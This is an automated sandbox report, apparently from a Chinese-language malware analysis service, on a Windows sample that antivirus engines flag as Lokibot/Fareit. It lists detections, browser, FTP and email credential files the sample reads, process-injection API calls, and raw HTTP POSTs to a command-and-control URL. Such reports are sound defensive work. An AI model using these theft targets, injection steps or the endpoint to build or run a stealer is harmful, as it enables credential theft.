11.4
0-day
56 个模型检测该样本为恶意!
重新分析
更多

4529a16a204933c5135c633c039d546c171c014813b65c68923133f65f895fce

dd19b37a2b9a1e2ed964e131caa8a6e7.exe

分析耗时

94s

最近分析

文件大小

586.5KB
静态报毒 动态报毒 100% AGEN AGENTTESLA AI SCORE=80 AIDETECTVM ANDROM AWBM BSCOPE CLASSIC CONFIDENCE DELPHILESS ELTZ ELZG FAREIT HIGH CONFIDENCE HJZDCC KGW@A8S2X7NI KRYPT LOKIBOT MALWARE1 MALWARE@#1KPZ717B0W1C1 PUTTY R + MAL R066C0DIK20 SCORE SIMDA STATIC AI SUSGEN SUSPICIOUS PE UNSAFE WRQF X2059 ZELPHIF ZUSY 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Fareit-FSK!DD19B37A2B9A 20201211 6.0.6.653
Alibaba Backdoor:Win32/Lokibot.758ff0df 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20201210 21.1.5827.0
Tencent Win32.Backdoor.Androm.Wrqf 20201211 1.0.0.1
Kingsoft 20201211 2017.9.26.565
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (3 个事件)
Time & API Arguments Status Return Repeated
1619980806.172375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619980807.484375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619980808.219375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619980804.375375
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (3 个事件)
Time & API Arguments Status Return Repeated
1619948418.313205
__exception__
stacktrace: 
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 34144064
registers.edi: 0
registers.eax: 0
registers.ebp: 34144136
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 1969237513
exception.instruction_r: f7 f0 33 c0 5a 59 59 64 89 10 eb 50 e9 66 37 fa
exception.symbol: dd19b37a2b9a1e2ed964e131caa8a6e7+0x5fe25
exception.instruction: div eax
exception.module: dd19b37a2b9a1e2ed964e131caa8a6e7.exe
exception.exception_code: 0xc0000094
exception.offset: 392741
exception.address: 0x45fe25
success 0 0
1619980809.531375
__exception__
stacktrace: 
dd19b37a2b9a1e2ed964e131caa8a6e7+0x12fdd @ 0x412fdd
dd19b37a2b9a1e2ed964e131caa8a6e7+0x1296e @ 0x41296e
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 40828724
registers.edi: 35124298
registers.eax: 41091104
registers.ebp: 40828732
registers.edx: 6172672
registers.ebx: 41091104
registers.esi: 858591252
registers.ecx: 0
exception.instruction_r: 8a 0a 88 0c 17 42 4e 75 f7 5f 5e 5d c3 55 8b ec
exception.symbol: dd19b37a2b9a1e2ed964e131caa8a6e7+0x2b41
exception.instruction: mov cl, byte ptr [edx]
exception.module: dd19b37a2b9a1e2ed964e131caa8a6e7.exe
exception.exception_code: 0xc0000005
exception.offset: 11073
exception.address: 0x402b41
success 0 0
1619980874.625375
__exception__
stacktrace: 
dd19b37a2b9a1e2ed964e131caa8a6e7+0x12fdd @ 0x412fdd
dd19b37a2b9a1e2ed964e131caa8a6e7+0x1296e @ 0x41296e
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 904134452
registers.edi: 898060714
registers.eax: 904134688
registers.ebp: 904134460
registers.edx: 6172672
registers.ebx: 904134688
registers.esi: 858698420
registers.ecx: 0
exception.instruction_r: 8a 0a 88 0c 17 42 4e 75 f7 5f 5e 5d c3 55 8b ec
exception.symbol: dd19b37a2b9a1e2ed964e131caa8a6e7+0x2b41
exception.instruction: mov cl, byte ptr [edx]
exception.module: dd19b37a2b9a1e2ed964e131caa8a6e7.exe
exception.exception_code: 0xc0000005
exception.offset: 11073
exception.address: 0x402b41
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, HTTP version 1.0 used suspicious_request POST http://detrulp.com/m3-q/pin.php
Performs some HTTP requests (1 个事件)
request POST http://detrulp.com/m3-q/pin.php
Sends data using the HTTP POST Method (1 个事件)
request POST http://detrulp.com/m3-q/pin.php
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619948418.235205
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619948418.313205
NtAllocateVirtualMemory
process_identifier: 784
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005c0000
success 0 0
1619948418.313205
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02e10000
success 0 0
Steals private information from local Internet browsers (19 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619980808.094375
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dd19b37a2b9a1e2ed964e131caa8a6e7.exe
newfilepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
newfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
flags: 1
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dd19b37a2b9a1e2ed964e131caa8a6e7.exe
success 1 0
The binary likely contains encrypted or compressed data indicative of a packer (3 个事件)
entropy 7.714394897164579 section {'size_of_data': '0x0000aa00', 'virtual_address': '0x00061000', 'entropy': 7.714394897164579, 'name': 'DATA', 'virtual_size': '0x0000a838'} description A section with a high entropy has been found
entropy 7.497013722264664 section {'size_of_data': '0x0001f200', 'virtual_address': '0x0007a000', 'entropy': 7.497013722264664, 'name': '.rsrc', 'virtual_size': '0x0001f05c'} description A section with a high entropy has been found
entropy 0.2852263023057216 description Overall entropy of this PE file is high
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1619980807.375375
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Harvests credentials from local FTP client softwares (22 个事件)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 784 called NtSetContextThread to modify thread in remote process 2732
Time & API Arguments Status Return Repeated
1619948418.844205
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2732
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 784 resumed a thread in remote process 2732
Time & API Arguments Status Return Repeated
1619948419.110205
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2732
success 0 0
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1619948418.672205
CreateProcessInternalW
thread_identifier: 2340
thread_handle: 0x00000100
process_identifier: 2732
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dd19b37a2b9a1e2ed964e131caa8a6e7.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000104
inherit_handles: 0
success 1 0
1619948418.672205
NtUnmapViewOfSection
process_identifier: 2732
region_size: 4096
process_handle: 0x00000104
base_address: 0x00400000
success 0 0
1619948418.672205
NtMapViewOfSection
section_handle: 0x0000010c
process_identifier: 2732
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000104
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619948418.844205
NtGetContextThread
thread_handle: 0x00000100
success 0 0
1619948418.844205
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2732
success 0 0
1619948419.110205
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2732
success 0 0
1619980805.047375
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 2732
success 0 0
File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.302775
FireEye Generic.mg.dd19b37a2b9a1e2e
McAfee Fareit-FSK!DD19B37A2B9A
Cylance Unsafe
Zillya Trojan.Injector.Win32.728056
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Backdoor:Win32/Lokibot.758ff0df
K7GW Riskware ( 0040eff71 )
Cybereason malicious.a61627
Arcabit Trojan.Zusy.D49EB7
Symantec Trojan.Gen.2
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Backdoor.Win32.Androm.gen
BitDefender Gen:Variant.Zusy.302775
NANO-Antivirus Trojan.Win32.Stealer.hjzdcc
Avast Win32:Malware-gen
Tencent Win32.Backdoor.Androm.Wrqf
Ad-Aware Gen:Variant.Zusy.302775
Sophos Mal/Generic-R + Mal/Fareit-AA
Comodo Malware@#1kpz717b0w1c1
DrWeb Trojan.PWS.Stealer.27790
VIPRE Trojan.Win32.Simda.ba (v)
TrendMicro TROJ_GEN.R066C0DIK20
McAfee-GW-Edition BehavesLike.Win32.Fareit.hc
Emsisoft Gen:Variant.Zusy.302775 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin Backdoor.Androm.awbm
eGambit Unsafe.AI_Score_99%
Avira HEUR/AGEN.1133569
Antiy-AVL Trojan/Win32.Lokibot
Gridinsoft Trojan.Win32.Injector.cc
Microsoft Trojan:Win32/Lokibot.VD!MTB
ZoneAlarm HEUR:Backdoor.Win32.Androm.gen
GData Gen:Variant.Zusy.302775
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
BitDefenderTheta Gen:NN.ZelphiF.34670.KGW@a8s2X7ni
ALYac Gen:Variant.Zusy.302775
MAX malware (ai score=80)
VBA32 BScope.Trojan.Crypt
Malwarebytes Spyware.AgentTesla
ESET-NOD32 a variant of Win32/Injector.ELTZ
TrendMicro-HouseCall TROJ_GEN.R066C0DIK20
Rising Trojan.Injector!1.CB27 (CLASSIC)
Ikarus Trojan.Win32.Krypt
MaxSecure Trojan.Malware.300983.susgen
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x46d150 VirtualFree
0x46d154 VirtualAlloc
0x46d158 LocalFree
0x46d15c LocalAlloc
0x46d160 GetVersion
0x46d164 GetCurrentThreadId
0x46d170 VirtualQuery
0x46d174 WideCharToMultiByte
0x46d178 MultiByteToWideChar
0x46d17c lstrlenA
0x46d180 lstrcpynA
0x46d184 LoadLibraryExA
0x46d188 GetThreadLocale
0x46d18c GetStartupInfoA
0x46d190 GetProcAddress
0x46d194 GetModuleHandleA
0x46d198 GetModuleFileNameA
0x46d19c GetLocaleInfoA
0x46d1a0 GetCommandLineA
0x46d1a4 FreeLibrary
0x46d1a8 FindFirstFileA
0x46d1ac FindClose
0x46d1b0 ExitProcess
0x46d1b4 WriteFile
0x46d1bc RtlUnwind
0x46d1c0 RaiseException
0x46d1c4 GetStdHandle
Library user32.dll:
0x46d1cc GetKeyboardType
0x46d1d0 LoadStringA
0x46d1d4 MessageBoxA
0x46d1d8 CharNextA
Library advapi32.dll:
0x46d1e0 RegQueryValueExA
0x46d1e4 RegOpenKeyExA
0x46d1e8 RegCloseKey
Library oleaut32.dll:
0x46d1f0 SysFreeString
0x46d1f4 SysReAllocStringLen
0x46d1f8 SysAllocStringLen
Library kernel32.dll:
0x46d200 TlsSetValue
0x46d204 TlsGetValue
0x46d208 LocalAlloc
0x46d20c GetModuleHandleA
Library advapi32.dll:
0x46d214 RegQueryValueExA
0x46d218 RegOpenKeyExA
0x46d21c RegCloseKey
Library kernel32.dll:
0x46d224 lstrcpyA
0x46d228 lstrcmpA
0x46d22c WriteFile
0x46d234 WaitForSingleObject
0x46d238 VirtualQuery
0x46d23c VirtualAlloc
0x46d240 Sleep
0x46d244 SizeofResource
0x46d248 SetThreadLocale
0x46d24c SetFilePointer
0x46d250 SetEvent
0x46d254 SetErrorMode
0x46d258 SetEndOfFile
0x46d25c ResetEvent
0x46d260 ReadFile
0x46d264 MulDiv
0x46d268 LockResource
0x46d26c LoadResource
0x46d270 LoadLibraryA
0x46d27c GlobalUnlock
0x46d280 GlobalReAlloc
0x46d284 GlobalHandle
0x46d288 GlobalLock
0x46d28c GlobalFree
0x46d290 GlobalFindAtomA
0x46d294 GlobalDeleteAtom
0x46d298 GlobalAlloc
0x46d29c GlobalAddAtomA
0x46d2a0 GetVersionExA
0x46d2a4 GetVersion
0x46d2a8 GetTickCount
0x46d2ac GetThreadLocale
0x46d2b4 GetSystemTime
0x46d2b8 GetSystemInfo
0x46d2bc GetStringTypeExA
0x46d2c0 GetStdHandle
0x46d2c4 GetProcAddress
0x46d2c8 GetModuleHandleA
0x46d2cc GetModuleFileNameA
0x46d2d0 GetLocaleInfoA
0x46d2d4 GetLocalTime
0x46d2d8 GetLastError
0x46d2dc GetFullPathNameA
0x46d2e0 GetFileAttributesA
0x46d2e4 GetDiskFreeSpaceA
0x46d2e8 GetDateFormatA
0x46d2ec GetCurrentThreadId
0x46d2f0 GetCurrentProcessId
0x46d2f4 GetCPInfo
0x46d2f8 GetACP
0x46d2fc FreeResource
0x46d300 InterlockedExchange
0x46d304 FreeLibrary
0x46d308 FormatMessageA
0x46d30c FindResourceA
0x46d310 FindFirstFileA
0x46d314 FindClose
0x46d324 ExitThread
0x46d328 ExitProcess
0x46d32c EnumCalendarInfoA
0x46d338 CreateThread
0x46d33c CreateFileA
0x46d340 CreateEventA
0x46d344 CompareStringA
0x46d348 CloseHandle
Library version.dll:
0x46d350 VerQueryValueA
0x46d358 GetFileVersionInfoA
Library gdi32.dll:
0x46d360 UnrealizeObject
0x46d364 StretchBlt
0x46d368 SetWindowOrgEx
0x46d36c SetWinMetaFileBits
0x46d370 SetViewportOrgEx
0x46d374 SetTextColor
0x46d378 SetStretchBltMode
0x46d37c SetROP2
0x46d380 SetPixel
0x46d384 SetEnhMetaFileBits
0x46d388 SetDIBColorTable
0x46d38c SetBrushOrgEx
0x46d390 SetBkMode
0x46d394 SetBkColor
0x46d398 SelectPalette
0x46d39c SelectObject
0x46d3a0 SaveDC
0x46d3a4 RestoreDC
0x46d3a8 Rectangle
0x46d3ac RectVisible
0x46d3b0 RealizePalette
0x46d3b4 Polyline
0x46d3b8 PlayEnhMetaFile
0x46d3bc PatBlt
0x46d3c0 MoveToEx
0x46d3c4 MaskBlt
0x46d3c8 LineTo
0x46d3cc IntersectClipRect
0x46d3d0 GetWindowOrgEx
0x46d3d4 GetWinMetaFileBits
0x46d3d8 GetTextMetricsA
0x46d3e4 GetStockObject
0x46d3e8 GetPixel
0x46d3ec GetPaletteEntries
0x46d3f0 GetObjectA
0x46d3fc GetEnhMetaFileBits
0x46d400 GetDeviceCaps
0x46d404 GetDIBits
0x46d408 GetDIBColorTable
0x46d40c GetDCOrgEx
0x46d414 GetClipBox
0x46d418 GetBrushOrgEx
0x46d41c GetBitmapBits
0x46d420 ExcludeClipRect
0x46d424 DeleteObject
0x46d428 DeleteEnhMetaFile
0x46d42c DeleteDC
0x46d430 CreateSolidBrush
0x46d434 CreatePenIndirect
0x46d438 CreatePalette
0x46d440 CreateFontIndirectA
0x46d444 CreateDIBitmap
0x46d448 CreateDIBSection
0x46d44c CreateCompatibleDC
0x46d454 CreateBrushIndirect
0x46d458 CreateBitmap
0x46d45c CopyEnhMetaFileA
0x46d460 BitBlt
Library user32.dll:
0x46d468 CreateWindowExA
0x46d46c WindowFromPoint
0x46d470 WinHelpA
0x46d474 WaitMessage
0x46d478 UpdateWindow
0x46d47c UnregisterClassA
0x46d480 UnhookWindowsHookEx
0x46d484 TranslateMessage
0x46d48c TrackPopupMenu
0x46d494 ShowWindow
0x46d498 ShowScrollBar
0x46d49c ShowOwnedPopups
0x46d4a0 ShowCursor
0x46d4a4 SetWindowsHookExA
0x46d4a8 SetWindowTextA
0x46d4ac SetWindowPos
0x46d4b0 SetWindowPlacement
0x46d4b4 SetWindowLongA
0x46d4b8 SetTimer
0x46d4bc SetScrollRange
0x46d4c0 SetScrollPos
0x46d4c4 SetScrollInfo
0x46d4c8 SetRect
0x46d4cc SetPropA
0x46d4d0 SetParent
0x46d4d4 SetMenuItemInfoA
0x46d4d8 SetMenu
0x46d4dc SetForegroundWindow
0x46d4e0 SetFocus
0x46d4e4 SetCursor
0x46d4e8 SetClassLongA
0x46d4ec SetCapture
0x46d4f0 SetActiveWindow
0x46d4f4 SendMessageA
0x46d4f8 ScrollWindow
0x46d4fc ScreenToClient
0x46d500 RemovePropA
0x46d504 RemoveMenu
0x46d508 ReleaseDC
0x46d50c ReleaseCapture
0x46d518 RegisterClassA
0x46d51c RedrawWindow
0x46d520 PtInRect
0x46d524 PostQuitMessage
0x46d528 PostMessageA
0x46d52c PeekMessageA
0x46d530 OffsetRect
0x46d534 OemToCharA
0x46d538 MessageBoxA
0x46d53c MapWindowPoints
0x46d540 MapVirtualKeyA
0x46d544 LoadStringA
0x46d548 LoadKeyboardLayoutA
0x46d54c LoadIconA
0x46d550 LoadCursorA
0x46d554 LoadBitmapA
0x46d558 KillTimer
0x46d55c IsZoomed
0x46d560 IsWindowVisible
0x46d564 IsWindowEnabled
0x46d568 IsWindow
0x46d56c IsRectEmpty
0x46d570 IsIconic
0x46d574 IsDialogMessageA
0x46d578 IsChild
0x46d57c InvalidateRect
0x46d580 IntersectRect
0x46d584 InsertMenuItemA
0x46d588 InsertMenuA
0x46d58c InflateRect
0x46d594 GetWindowTextA
0x46d598 GetWindowRect
0x46d59c GetWindowPlacement
0x46d5a0 GetWindowLongA
0x46d5a4 GetWindowDC
0x46d5a8 GetTopWindow
0x46d5ac GetSystemMetrics
0x46d5b0 GetSystemMenu
0x46d5b4 GetSysColorBrush
0x46d5b8 GetSysColor
0x46d5bc GetSubMenu
0x46d5c0 GetScrollRange
0x46d5c4 GetScrollPos
0x46d5c8 GetScrollInfo
0x46d5cc GetPropA
0x46d5d0 GetParent
0x46d5d4 GetWindow
0x46d5d8 GetMenuStringA
0x46d5dc GetMenuState
0x46d5e0 GetMenuItemInfoA
0x46d5e4 GetMenuItemID
0x46d5e8 GetMenuItemCount
0x46d5ec GetMenu
0x46d5f0 GetLastActivePopup
0x46d5f4 GetKeyboardState
0x46d5fc GetKeyboardLayout
0x46d600 GetKeyState
0x46d604 GetKeyNameTextA
0x46d608 GetInputState
0x46d60c GetIconInfo
0x46d610 GetForegroundWindow
0x46d614 GetFocus
0x46d618 GetDlgItem
0x46d61c GetDesktopWindow
0x46d620 GetDCEx
0x46d624 GetDC
0x46d628 GetCursorPos
0x46d62c GetCursor
0x46d630 GetClipboardData
0x46d634 GetClientRect
0x46d638 GetClassNameA
0x46d63c GetClassInfoA
0x46d640 GetCapture
0x46d644 GetActiveWindow
0x46d648 FrameRect
0x46d64c FindWindowA
0x46d650 FillRect
0x46d654 EqualRect
0x46d658 EnumWindows
0x46d65c EnumThreadWindows
0x46d660 EndPaint
0x46d664 EnableWindow
0x46d668 EnableScrollBar
0x46d66c EnableMenuItem
0x46d670 DrawTextA
0x46d674 DrawMenuBar
0x46d678 DrawIconEx
0x46d67c DrawIcon
0x46d680 DrawFrameControl
0x46d684 DrawEdge
0x46d688 DispatchMessageA
0x46d68c DestroyWindow
0x46d690 DestroyMenu
0x46d694 DestroyIcon
0x46d698 DestroyCursor
0x46d69c DeleteMenu
0x46d6a0 DefWindowProcA
0x46d6a4 DefMDIChildProcA
0x46d6a8 DefFrameProcA
0x46d6ac CreatePopupMenu
0x46d6b0 CreateMenu
0x46d6b4 CreateIcon
0x46d6b8 ClientToScreen
0x46d6bc CheckMenuItem
0x46d6c0 CallWindowProcA
0x46d6c4 CallNextHookEx
0x46d6c8 BeginPaint
0x46d6cc CharNextA
0x46d6d0 CharLowerBuffA
0x46d6d4 CharLowerA
0x46d6d8 CharToOemA
0x46d6dc AdjustWindowRectEx
Library kernel32.dll:
0x46d6e8 Sleep
Library oleaut32.dll:
0x46d6f0 SafeArrayPtrOfIndex
0x46d6f4 SafeArrayGetUBound
0x46d6f8 SafeArrayGetLBound
0x46d6fc SafeArrayCreate
0x46d700 VariantChangeType
0x46d704 VariantCopy
0x46d708 VariantClear
0x46d70c VariantInit
Library ole32.dll:
0x46d714 CoTaskMemAlloc
0x46d718 CoCreateInstance
0x46d71c CoUninitialize
0x46d720 CoInitialize
Library comctl32.dll:
0x46d730 ImageList_Write
0x46d734 ImageList_Read
0x46d744 ImageList_DragMove
0x46d748 ImageList_DragLeave
0x46d74c ImageList_DragEnter
0x46d750 ImageList_EndDrag
0x46d754 ImageList_BeginDrag
0x46d758 ImageList_Remove
0x46d75c ImageList_DrawEx
0x46d760 ImageList_Replace
0x46d764 ImageList_Draw
0x46d774 ImageList_Add
0x46d77c ImageList_Destroy
0x46d780 ImageList_Create
0x46d784 InitCommonControls
Library comdlg32.dll:
0x46d78c GetSaveFileNameA
0x46d790 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 91.195.240.117 detrulp.com 80
192.168.56.101 49182 91.195.240.117 detrulp.com 80
192.168.56.101 49184 91.195.240.117 detrulp.com 80
192.168.56.101 49194 91.195.240.117 detrulp.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://detrulp.com/m3-q/pin.php 
POST /m3-q/pin.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: detrulp.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: F949D6FE
Content-Length: 196
Connection: close
http://detrulp.com/m3-q/pin.php 
POST /m3-q/pin.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: detrulp.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: F949D6FE
Content-Length: 169
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.